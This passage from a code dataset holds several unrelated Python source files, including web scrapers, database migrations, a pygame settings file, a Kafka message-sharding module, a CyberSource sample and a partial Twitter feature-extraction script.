'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy_fake_useragent.middleware.RandomUserAgentMiddleware': 400,\n }\n }\n \n def __init__(self, pages=1, **kwargs):\n self.start_url = \"https://gall.dcinside.com/board/lists/?id=comic_new2&page={}&exception_mode=recommend\".format(pages)\n super().__init__(**kwargs)\n \n def start_requests(self):\n url = self.start_url\n yield scrapy.Request(url, callback=self.parse)\n \n def parse(self, response):\n links = response.xpath('//*[@class=\"ub-content us-post\"]/td[2]/a[1]/@href').extract()\n links = list(map(response.urljoin, links))\n for link in links:\n yield scrapy.Request(link, callback=self.page_parse)\n \n def page_parse(self, response):\n item = ComicsItem()\n #title = response.xpath('//*[@class=\"gallview_head clear ub-content\"]/h3/span[2]/text()').extract_first()\n item[\"title\"] = response.xpath('//*[@class=\"gallview_head clear ub-content\"]/h3/span[2]/text()').extract_first()\n item[\"date\"] = response.xpath('//*[@class=\"gall_date\"]/text()').extract_first()\n item[\"views\"] = response.xpath('//*[@class=\"fr\"]/span[1]/text()').extract_first()[3:]\n item[\"recommend\"] = response.xpath('//*[@class=\"gall_reply_num\"]/text()').extract_first()[3:]\n item[\"link\"] = response.url\n \n try:\n try:\n # for DB\n item[\"img_link\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()[0]\n item[\"img_count\"] = len(response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract())\n item[\"image_urls\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()\n \n #for Images\n #images = []\n #img_urls = response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract()\n #img_count = len(response.xpath('//*[@style=\"overflow:hidden;\"]/p/img/@src').extract())\n \n #img_names = [ title + \"_\" + str(n) for n in range(img_count)]\n #for image_url, image_name in zip(img_urls, img_names):\n # images.append({'url': image_url, 'name': image_name})\n #\n #item[\"image_urls\"] = images\n except:\n pass\n \n try:\n # for DB\n item[\"img_link\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()[0]\n item[\"img_count\"] = len(response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract())\n item[\"image_urls\"] = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()\n \n # for Images\n #images = []\n #img_urls = response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract()\n #img_count = len(response.xpath('//*[@style=\"overflow:hidden;\"]/a/@href').extract())\n #\n #img_names = [ title + \"_\" + str(n) for n in range(img_count)]\n #for image_url, image_name in zip(img_urls, img_names):\n # images.append({'url': image_url, 'name': image_name})\n #\n #item[\"image_urls\"] = images\n except:\n pass\n except:\n item[\"img_count\"] = \"0\"\n item[\"img_link\"] = \"\"\n \n time.sleep(1) # 게시물 check 딜레이\n \n yield item\n","sub_path":"comics/comics/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"541912482","text":"import pygame as pg\nimport random\nimport os\nvec = pg.math.Vector2\n\n# set up asset folders\ngame_folder = os.path.dirname(__file__)\nimg_folder = os.path.join(game_folder,\"img\")\nsnd_folder = os.path.join(game_folder,\"snd\")\n\nTITLE = \"PROJECT LEGION\"\n\nWIDTH = 1280 # width of game window\nHEIGHT = 960 # height of game window\nFPS = 60 # frames per second\n\n# Colors (R, 
G, B)\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nRED = (255,0,0)\nLIME = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nCYAN = (0,255,255)\nLIGHTBLUE = (0, 155, 155)\nGREEN = (0, 155, 0)\n\n# Player properties\nPLAYER_ACC = 1.5\nPLAYER_FRICTION = -0.12\nPLAYER_GRAVITY = 0.5\nPLAYER_JUMP = 200\nPLAYER_HEIGHT = 100\nPLAYER_WIDTH = 75\nPLAYER_HEALTH = 100\nPLAYER_IMAGE = 'MitheralKnight.png'\nIFRAMES = 100\n\n#MOB PROPERTIES\nMOB_DAMAGE = 25\n\n# layers properties\nPLAYER_LAYER = 2\nPLATFORM_LAYER = 1\nMOB_LAYER = 2\nEFFECTS_LAYER = 3\n\n# weapon properties\nWEAPON_EFFECT = ''\nWEAPONS = {}\nWEAPONS['sword'] = {'rate': 250,\n                    'knockback': 200,\n                    'damage': 15,\n                    'crit_chance': 5,\n                    'offset': vec(PLAYER_WIDTH - PLAYER_WIDTH * 1/4, PLAYER_HEIGHT / 2 - PLAYER_HEIGHT),\n                    'reach': (PLAYER_WIDTH*2, PLAYER_HEIGHT/8)}\n\n","sub_path":"PythonPortfolio-main/Projects/PROJECT LEGION/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"342933393","text":"import time\nimport numpy as np\n\nmycountry = (\"UA\", \"PL\")\nmycity = {'UA1': \"Kyiv\", 'UA2': \"Odessa\", 'UA3': \"Kharkiv\", 'UA4': \"Lviv\", 'UA5': \"Dnipro\",\n          'PL1': \"Warszawa\", 'PL2': \"Lublin\", 'PL3': \"Szczecin\", 'PL4': \"Wroclaw\", 'PL5': \"Bydgoszcz\"}\n\nf = open(\"advertise_log.csv\", \"w\")\n\ndef benchmark(func):\n    def wrapper(*args, **kwargs):\n        t = time.perf_counter()  # time.clock() was removed in Python 3.8\n        res = func(*args, **kwargs)\n        print(\"[{0}] has been done; duration time = {1:0.4f} s\".format(func.__name__, time.perf_counter() - t))\n        return res\n    return wrapper\n\n@benchmark\ndef write_f():\n    for item in range(int(1E8)):\n        rnd_county = np.random.randint(0, 2)\n        rnd_city = np.random.randint(1, 6)\n        choose_city = str(mycountry[rnd_county])+str(rnd_city)\n        rnd_userid = np.random.randint(2222,3333)\n        rnd_campaignid = np.random.randint(1, 10)\n        rnd_creativeid = np.random.randint(9, 20)\n        rnd_price = \"{0:0.2f}\".format(np.random.random()*np.random.randint(10, 25))\n        myList = [rnd_userid, mycountry[rnd_county], mycity[choose_city], rnd_campaignid, rnd_creativeid, rnd_price]\n        if item % 1000000 == 0:\n            print(item)\n        f.write( \",\".join([str(x) for x in myList])+ \"\\n\")\n    f.close()\n\n\nwrite_f()\n\n","sub_path":"myGenerator.py","file_name":"myGenerator.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"169068749","text":"\"\"\"added reserved media table\n\nRevision ID: 58a149e7eb23\nRevises: 22a55062d164\nCreate Date: 2015-06-05 13:37:40.736673\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '58a149e7eb23'\ndown_revision = '22a55062d164'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\ndef upgrade():\n    '''\n    id = db.Column(db.String(2000), primary_key=True)\n    owner_id = db.Column(db.String(2000), db.ForeignKey('users_user.id', ondelete=\"SET NULL\"), index=True)\n    owner = db.relationship(\"User\", primaryjoin=\"(ReservedMedia.owner_id == User.id)\")\n    type = db.Column(db.String(50))\n    media_file_name = db.Column(db.String(2000), index=True)\n    media_thumbnail_file_name = db.Column(db.String(2000), index=True)\n    media_file_is_deleted = db.Column(db.Boolean(), default=False)\n    media_thumbnail_file_is_deleted = db.Column(db.Boolean(), default=False)\n    reserved_time = db.Column(db.DateTime())\n    is_deleted = db.Column(db.Boolean(), default=False)\n    '''\n    op.create_table(\n        'media_reserved_media',\n        
sa.Column('id', sa.String(length=2000), primary_key=True),\n sa.Column('owner_id', sa.String(length=2000)),\n sa.Column('type', sa.String(length=50), nullable=True),\n sa.Column('media_file_name', sa.String(length=2000), nullable=True),\n sa.Column('media_thumbnail_file_name', sa.String(length=2000), nullable=True),\n sa.Column('media_file_is_deleted', sa.Boolean(), nullable=True),\n \tsa.Column('media_thumbnail_file_is_deleted', sa.Boolean(), nullable=True),\n sa.Column('reserved_time', sa.DateTime(), nullable=True),\n sa.Column('is_deleted', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], [u'users_user.id'], name=u'media_reserved_media_owner_id_fkey'),\n )\n op.create_index(op.f('ix_media_reserved_media_owner_id'), 'media_reserved_media', ['owner_id'], unique=False)\n op.create_index(op.f('ix_media_reserved_media_media_file_name'), 'media_reserved_media', ['media_file_name'], unique=False)\n op.create_index(op.f('ix_media_reserved_media_media_thumbnail_file_name'), 'media_reserved_media', ['media_thumbnail_file_name'], unique=False)\n\ndef downgrade():\n op.drop_table('media_reserved_media')","sub_path":"alembic/versions/58a149e7eb23_added_reserved_media_table.py","file_name":"58a149e7eb23_added_reserved_media_table.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238264953","text":"##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\n# $Id$\n\nfrom esys.escript import *\nfrom esys.escript import unitsSI as U\nfrom esys.escript.pdetools import MaskFromBoundaryTag\nfrom esys.finley import ReadMesh\nfrom esys.weipa import saveVTK\nfrom esys.escript.models import StokesProblemCartesian\nfrom math import ceil\n#\n# Parameter\n#\nDIM=2\nMESHFILE=\"sub.fly\"\nETA=1.e22*U.Pa*U.sec\nV_MAX=1.*U.cm/U.yr\nALPHA=30*U.DEG\nSTRIKE=10*U.DEG\nDIP=30*U.DEG\nN=1 # boudary layer control\n\n\ng=9.81*U.m/U.sec**2\n#\n# derived values\n#\ndom=ReadMesh(MESHFILE)\nDIM=dom.getDim()\nbb=boundingBox(dom)\nLX=bb[0][1]-bb[0][0]\nif DIM == 3: LY=bb[1][1]-bb[1][0]\nDEPTH=bb[DIM-1][1]-bb[DIM-1][0]\n\nsc=StokesProblemCartesian(dom)\nx = dom.getX()\n#\nv=Vector(0.,Solution(dom))\nmask=Vector(0.,Solution(dom))\n#\n# in subduction zone:\n#\n\nif DIM==2: \n S=numpy.array([0.,0.])\n X0=[bb[0][0],bb[1][1]]\n dd=[-cos(ALPHA),-sin(ALPHA)]\nelse:\n S=numpy.array([sin(STRIKE),cos(STRIKE),0.])\n X0=[bb[0][0],bb[1][0],bb[2][1]]\n dd=[-cos(ALPHA),0.,-sin(ALPHA)]\nr=sqrt(length(x-X0)**2-inner(X0-x,S)**2)\nv=V_MAX*r*dd\nmask=MaskFromBoundaryTag(dom,\"subduction\")*[ 1. 
for i in range(DIM) ]\n#\n# back of the domain\n#\nv=v*(1.-whereZero(x[0]-bb[0][1])*kronecker(DIM)[0])\nmask+=whereZero(x[0]-bb[0][1])*kronecker(DIM)[0]\n#\n# bottom of the domain\n#\nv=v*(1.-((bb[DIM-1][1]-x[DIM-1])/DEPTH)**N*kronecker(DIM)[DIM-1])\nmask+=whereZero(x[DIM-1]-bb[DIM-1][0])*kronecker(DIM)[DIM-1]\n#\n# faces of the domain:\n#\nif DIM==3:\n v=v*(1.-(((x[1]-bb[1][0])*(bb[1][1]-x[1])/(0.5*LY)**2)**N*kronecker(DIM)[1]))\n mask+=(whereZero(x[1]-bb[1][0])+whereZero(x[1]-bb[1][1]))*kronecker(DIM)[1]\nsc.initialize(eta=ETA, fixed_u_mask= mask)\np=Scalar(0.,ReducedSolution(dom))\nv,p=sc.solve(v,p, verbose=True)\nsaveVTK(\"u.vtu\",velocity=v,pressure=p,m=mask)\n\n","sub_path":"finley/test/python/subduction1.py","file_name":"subduction1.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"401183758","text":"import requests, boto3, os\nfrom datetime import datetime\n\n# bucket = spd-police-reports\nAWS_CONFIG = {\n 'S3_BUCKET': os.environ['AWS_CONFIG_S3_BUCKET'],\n 'ACCESS_KEY': os.environ['AWS_CONFIG_ACCESS_KEY'],\n 'SECRET_KEY': os.environ['AWS_CONFIG_SECRET_KEY']\n}\n\nsession = boto3.Session(\n aws_access_key_id=AWS_CONFIG['ACCESS_KEY'],\n aws_secret_access_key=AWS_CONFIG['SECRET_KEY'],\n)\ns3 = session.resource('s3')\n\ndef scrape_reports(event, context):\n print('scraping reports...')\n all_categories = {'Animal', 'Arrest', 'Assault', 'Bike', 'Burglary', 'CarProwl', 'Collision', 'Crisis', 'DUI', 'Disorderly', 'Disturbance', 'DriveBy', 'Dumping', 'FalseAlarm', 'Fraud', 'Harbor', 'Homicide', 'Injury', 'Liquor', 'Lost', 'Metro', 'Narcotics', 'OtherProp', 'OtherVice', 'PropDamage', 'Prostitution', 'Purse_Snatch', 'Robbery', 'SOAP', 'SODA', 'Shoplifting', 'Threats', 'Traffic', 'Trespass', 'Unsafe', 'VehicleTheft', 'Weapon'}\n where_params = ' OR '.join([f\"(mapcategory = '{cat}')\" for cat in all_categories])\n query_url = 'https://gisrevprxy.seattle.gov/arcgis/rest/services/SPD_EXT/SPDReports/MapServer/0/query'\n params = {\n 'f': 'json',\n 'where': where_params,\n 'returnGeometry': 'true',\n 'spatialRel': 'esriSpatialRelIntersects',\n 'geometry': '{\"xmin\":-13775786.985667564,\"ymin\":5948635.289265888,\"xmax\":-13462700.917811498,\"ymax\":6261721.357121956,\"spatialReference\":{\"wkid\":102100}}',\n 'geometryType': 'esriGeometryEnvelope',\n 'inSR': '102100',\n 'outFields': '*',\n 'outSR': '102100'\n }\n res = requests.get(query_url, params=params)\n\n date = datetime.utcnow().strftime('%Y%m%d_%H%M%S')\n key = f'police_reports_{date}.json'\n s3.Bucket(AWS_CONFIG['S3_BUCKET']).put_object(Key=key, Body=res.text)\n print(f'successfully uploaded to {key}')\n","sub_path":"scheduled/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36612701","text":"import matplotlib.pyplot as plt \nimport numpy as np \n\nx = np.linspace(-3,3,50)\ny1 = 2*x + 1\ny2 = x**2\n\nplt.figure()\n\n# 设置坐标轴的名字和范围\nplt.xlim((-1,2))\nplt.ylim((-2,3))\nplt.xlabel(('I am x'))\nplt.ylabel(('I am y'))\n\n# 改变坐标轴上ticks的显示\n# 使用plt.xticks设置x轴刻度:范围是(-1,2);个数是5.\n# 使用plt.yticks设置y轴刻度以及名称:\n# 刻度为[-2, -1.8, -1, 1.22, 3];\n# 对应刻度的名称为[‘really bad’,’bad’,’normal’,’good’, ‘really good’].\nnew_ticks = np.linspace(-1,2,5)\nprint(new_ticks)\nplt.xticks(new_ticks)\nplt.yticks([-2,-1.8,-1,1.22,3],[r'$really\\ bad$', r'$bad$', r'$normal$', r'$good$', r'$really\\ good$'])\n\nl1, = plt.plot(x, y2, label='up')\nl2, 
= plt.plot(x, y1, color='red', linewidth=1.0, linestyle='--', label='down')\nplt.legend(handles=[l1,l2], labels=['aaa','bbb'], loc='best')\n\nplt.show()","sub_path":"matplotlib/05_matplotlib_legend.py","file_name":"05_matplotlib_legend.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"476645470","text":"from common.const import DestType, SrcType\nfrom kafka.client import KafkaClient\nfrom django.conf import settings\nimport struct\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\n# route and sharding\ndef encode_partition_id(partition_id):\n return struct.pack('>H', partition_id)\n\n\ndef decode_partition_id(packed_partition_id):\n return struct.unpack('>H', packed_partition_id)[0]\n\n\ndef is_conv_event(msg_type):\n from apps.message.models import Message\n return msg_type in (\n Message.TYPE_TEXT_CHAT_CREATED,\n Message.TYPE_MULTIMEDIA_CHAT_CREATED,\n Message.TYPE_APP_CONTENT_UPDATED,\n )\n\n\ndef hash_spec():\n return {'type': 'hash'}\n\n\ndef list_spec(addrs):\n spec = {'type': 'list'}\n if len(addrs) == 0 or isinstance(addrs[0], int):\n spec['arguments'] = {\n 'type': 'id_list',\n 'addrs': addrs\n }\n return spec\n else:\n spec['arguments'] = {\n 'type': 'peer_list' if len(addrs[0]) == 4 else 'conv_list',\n 'addrs': addrs\n }\n return spec\n\n\ndef dest_type2peer_type(dest_type):\n from common.const import PeerType\n return {\n DestType.ORG_MEMBER: PeerType.ORG_MEMBER,\n DestType.DEPARTMENT: PeerType.DEPARTMENT,\n DestType.DISCUSSION_GROUP: PeerType.DISCUSSION_GROUP,\n }.get(dest_type)\n\n\n# @TODO fix here\ndef src_type2peer_type(src_type):\n from common.const import PeerType\n if src_type == SrcType.ORG_MEMBER:\n return PeerType.ORG_MEMBER\n else:\n return src_type\n\n\ndef collapse(msg):\n from apps.account.models import User\n dest_type = msg['dest_type']\n if dest_type != DestType.USER_ORG:\n return [msg]\n dest_id = msg['dest_id']\n user = User.objects.getx(id=dest_id)\n if user is None:\n log.error(\"user_org message send failed, reason:%s not found\", dest_id)\n return []\n msgs = []\n for org in user.orgs():\n org_id = org.org_id\n m = msg.copy()\n m['scope_org_id'] = org_id\n m['dest_type'] = DestType.ORG\n m['dest_id'] = org_id\n msgs.append(m)\n return msgs\n\n\ndef generate_route_spec(data):\n from apps.message.models import Message\n msg_type = data['type']\n dest_type = data['dest_type']\n if not is_conv_event(msg_type):\n user_ids = []\n if dest_type == DestType.ORG_MEMBER:\n user_ids.append(int(data['dest_id']))\n if 'src_type' in data and 'src_id' in data \\\n and data['src_type'] == SrcType.ORG_MEMBER \\\n and data['type'] != Message.TYPE_MESSAGE_READ:\n user_ids.append(int(data['src_id']))\n user_ids = list(set(user_ids))\n return list_spec(user_ids)\n elif dest_type in (DestType.DISCUSSION_GROUP, DestType.DEPARTMENT, DestType.ORG):\n return hash_spec()\n else:\n if dest_type == DestType.ORG_MEMBER:\n peer_list = [data['src_id'], data['dest_id']]\n return list_spec(list(set(peer_list)))\n else:\n return hash_spec()\n\n\ndef get_partition_cnt(queue):\n kc = KafkaClient(settings.KAFKA_URL)\n return len(kc.get_partition_ids_for_topic(queue))\n\n\ndef calc_landbridge_server_url(user_id):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = landbridge_spec['cluster_size']\n index = user_id % mod\n return landbridge_spec['shard'][index]['url']\n\n\ndef calc_partition_id(user_id):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = 
landbridge_spec['cluster_size']\n index = user_id % mod\n return landbridge_spec['shard'][index]['queue_partition']\n\n\ndef partition_id2queue_partition_id(index):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n return landbridge_spec['shard'][index]['queue_partition']\n\n\ndef do_partition(addrs):\n partitions = {}\n for addr in addrs:\n if isinstance(addr, int):\n partition_id = calc_partition_id(addr)\n elif isinstance(addr, list):\n partition_id = calc_partition_id(addr[0])\n else:\n raise ValueError('partition id list error')\n append_to_dict(partitions, partition_id, addr)\n return partitions\n\n\ndef do_sharding(msg, partition_num):\n import copy\n route_spec = msg['shard']\n if route_spec is None:\n return [msg]\n\n sharded_msg = {}\n route_type = route_spec['type']\n if route_type is None:\n return [msg]\n elif route_type == 'list':\n args = route_spec['arguments']\n list_type = args['type']\n list_addrs = args['addrs']\n if list_type in ('id_list', 'peer_list', 'conv_list'):\n shards = do_partition(list_addrs)\n for (k, v) in shards.items():\n m = msg.copy()\n m['shard']['arguments']['addrs'] = v\n sharded_msg[k] = [m]\n return sharded_msg\n else:\n raise ValueError('unknown list route')\n\n elif route_type == 'hash':\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = landbridge_spec['cluster_size']\n for i in range(mod):\n m = copy.deepcopy(msg)\n m['shard']['arguments'] = {'mod': mod, 'index': i}\n queue_partition = partition_id2queue_partition_id(i)\n append_to_dict(sharded_msg, queue_partition, m)\n return sharded_msg\n else:\n raise ValueError(\"not support shard type now\")\n\n\ndef append_to_dict(dictionary, k, v):\n acc = dictionary.get(k)\n if acc is None:\n dictionary[k] = [v]\n else:\n acc.append(v)\n","sub_path":"starfish-ws/common/shard.py","file_name":"shard.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"498119033","text":"# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n# a**2 + b**2 = c**2\n# For example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2\n# Given N, Check if there exists any Pythagorean triplet for which a + b + c = N.\n# Find maximum possible value of abc among all such Pythagorean triplets.\n# If there is no such Pythagorean triplet print -1.\n\nimport sys\nfrom math import sqrt\n\ndef calc_pyth(N):\n max_product = -1\n # use quadratic formula\n for c in range(N):\n if (c**2 + 2*c*N - N**2) >= 0:\n b_plus = (N - c + sqrt(c**2 + 2*c*N - N**2)) / 2\n b_minus = (N - c - sqrt(c**2 + 2*c*N - N**2)) / 2\n if (b_plus % 1 == 0) and (b_plus > 0):\n temp_plus = c * b_plus * (N - c - b_plus)\n if (temp_plus > max_product) and (temp_plus > 0):\n max_product = temp_plus\n if (b_minus % 1 == 0) and (b_minus > 0):\n temp_minus = c * b_minus * (N - c - b_minus)\n if (temp_minus > max_product) and (temp_minus > 0):\n max_product = temp_minus\n return int(max_product)\n \n\nt = int(raw_input().strip())\nfor a0 in xrange(t):\n n = int(raw_input().strip())\n print(calc_pyth(n))\n","sub_path":"Problem_009.py","file_name":"Problem_009.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"273469083","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport sys\n\nname=str(sys.argv[1])\n\nurl = 'https://it.wikipedia.org/wiki/{}'.format(name)\nprint (url)\nresponse = requests.get(url, timeout=5)\ncontent = BeautifulSoup(response.content, 
\"html.parser\")\n\nauthor = content.find('h1', attrs={\"class\": \"firstHeading\"}).text\n\ncitArr = []\n\nfor cit in content.findAll('table', attrs={\"class\": \"citazione-table\"}):\n\tcitObject = {\n\t\t\"Author\" : author,\n\t\t\"text\" : cit.find('p').text\n\t}\n\tcitArr.append(citObject)\n\nwith open('citData.json','w', encoding='utf-8') as outfile:\n\tjson.dump(citArr, outfile, ensure_ascii=False, indent=2)","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"203295113","text":"from CyberSource import *\nfrom pathlib import Path\nimport os\nimport json\nfrom importlib.machinery import SourceFileLoader\n\nconfig_file = os.path.join(os.getcwd(), \"data\", \"Configuration.py\")\nconfiguration = SourceFileLoader(\"module.name\", config_file).load_module()\n\n# To delete None values in Input Request Json body\ndef del_none(d):\n for key, value in list(d.items()):\n if value is None:\n del d[key]\n elif isinstance(value, dict):\n del_none(value)\n return d\n\ndef add_duplicate_information(type):\n orderInformationAddressAddress1 = \"1234 Sample St.\"\n orderInformationAddressAddress2 = \"Mountain View\"\n orderInformationAddressLocality = \"California\"\n orderInformationAddressCountry = \"US\"\n orderInformationAddressAdministrativeArea = \"CA\"\n orderInformationAddressPostalCode = \"94043\"\n orderInformationAddress = Riskv1liststypeentriesOrderInformationAddress(\n address1 = orderInformationAddressAddress1,\n address2 = orderInformationAddressAddress2,\n locality = orderInformationAddressLocality,\n country = orderInformationAddressCountry,\n administrative_area = orderInformationAddressAdministrativeArea,\n postal_code = orderInformationAddressPostalCode\n )\n\n orderInformationBillToFirstName = \"John\"\n orderInformationBillToLastName = \"Doe\"\n orderInformationBillToEmail = \"nobody@example.com\"\n orderInformationBillTo = Riskv1liststypeentriesOrderInformationBillTo(\n first_name = orderInformationBillToFirstName,\n last_name = orderInformationBillToLastName,\n email = orderInformationBillToEmail\n )\n\n orderInformation = Riskv1liststypeentriesOrderInformation(\n address = orderInformationAddress.__dict__,\n bill_to = orderInformationBillTo.__dict__\n )\n\n paymentInformation = Riskv1liststypeentriesPaymentInformation(\n )\n\n clientReferenceInformationCode = \"54323007\"\n clientReferenceInformation = Riskv1decisionsClientReferenceInformation(\n code = clientReferenceInformationCode\n )\n\n riskInformationMarkingDetailsAction = \"add\"\n riskInformationMarkingDetails = Riskv1liststypeentriesRiskInformationMarkingDetails(\n action = riskInformationMarkingDetailsAction\n )\n\n riskInformation = Riskv1liststypeentriesRiskInformation(\n marking_details = riskInformationMarkingDetails.__dict__\n )\n\n requestObj = AddNegativeListRequest(\n order_information = orderInformation.__dict__,\n payment_information = paymentInformation.__dict__,\n client_reference_information = clientReferenceInformation.__dict__,\n risk_information = riskInformation.__dict__\n )\n\n\n requestObj = del_none(requestObj.__dict__)\n requestObj = json.dumps(requestObj)\n\n\n try:\n config_obj = configuration.Configuration()\n client_config = config_obj.get_configuration()\n api_instance = DecisionManagerApi(client_config)\n return_data, status, body = api_instance.add_negative(type, requestObj)\n\n print(\"\\nAPI RESPONSE CODE : \", status)\n print(\"\\nAPI RESPONSE 
BODY : \", body)\n\n write_log_audit(status)\n return return_data\n except Exception as e:\n write_log_audit(e.status if hasattr(e, 'status') else 999)\n print(\"\\nException when calling DecisionManagerApi->add_negative: %s\\n\" % e)\n\ndef write_log_audit(status):\n print(f\"[Sample Code Testing] [{Path(__file__).stem}] {status}\")\n\nif __name__ == \"__main__\":\n type = \"positive\"\n\n add_duplicate_information(type)\n","sub_path":"samples/RiskManagement/DecisionManager/add-duplicate-information.py","file_name":"add-duplicate-information.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10174547","text":"A=[1,1,2,3,5,8,13,21,34,55,88]\nB=[1,3,5,4,7,88,66,59,40,54]\nC = set(A) & set(B)\nprint(\"Các phần tử trùng nhau trong list A,B là\",C)\nfor i in A:\n for j in B:\n if(j==i):\n A.remove(j)\n B.remove(j)\nprint(\"Xóa các phần tử trong list A bị trùng nhau\",A)\nprint(\"Xóa các phần tử trong list B bị trùng nhau\",B)","sub_path":"Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"599182283","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('questions', '0005_auto_20150211_2041'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MatchAnswer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('importance_level', models.CharField(default=b'Somewhat Important', max_length=120, null=True, blank=True)),\n ('points', models.IntegerField(default=b'20')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('update', models.DateTimeField(auto_now=True)),\n ('answer', models.ForeignKey(blank=True, to='questions.Answer', null=True)),\n ('question', models.ForeignKey(to='questions.Question')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='useranswer',\n name='points',\n field=models.IntegerField(default=b'20'),\n preserve_default=True,\n ),\n ]\n","sub_path":"matchmaker/src/questions/migrations/0006_auto_20150211_2052.py","file_name":"0006_auto_20150211_2052.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290055719","text":"import json\nimport sys\nimport os\nimport numpy as np\nimport spacy\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom textblob import TextBlob\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn\n# Will predict popularity based on features extracted from ~100 tweets per day for 7 days for a set of topics\n# Features - Tweet length (chars, average sentence length, word count), time created (military standard),\n# day created (mon-sun), Number of hashtags used, Number of user mentions, number of links,\n# has media (pics, videos, etc.) 
NLP features, sentiment (Use VADER), ACCESS many through entities\n# response variable - retweets_count, favorite_count (likes),\n\n\ndef load_list (filepath):\n \"\"\"\n Given a filepath of a textfile containing contiguous Twitter Tweet object (JSON format), unpack them into a list and\n return\n @:param filepath - string pointing to the textfile to be analyzed\n @:return list of JSON-formatted strings representing Tweet Objects\n \"\"\"\n tweets = None\n with open(filepath, 'r') as file:\n tweets = []\n current_tweet = \"\"\n bracket_balance = 0\n while 1:\n current_char = file.read(1)\n if not current_char:\n break\n\n current_tweet = current_tweet + current_char\n\n if current_char == '{':\n bracket_balance += 1\n elif current_char == '}' and current_tweet[len(current_tweet) - 13:] != \"Intelligence}\" and \\\n current_tweet[len(current_tweet) - 10:] != \"ufe0f(~);}\":\n bracket_balance -= 1\n if bracket_balance == 0:\n print(current_tweet)\n current_dict = json.loads(current_tweet)\n tweets.append(current_dict)\n current_tweet = \"\"\n return tweets\n\n\ndef build_features(tweets):\n \"\"\"\n From a list of JSON-formatted strings representing Tweet objects, return a numpy array with tweets as rows and select\n features as columns\n @:param tweets - list of JSON-formatted strings representing Tweet objects\n @:return numpy numeric array with len(tweets) rows and columns corresponding to relevant 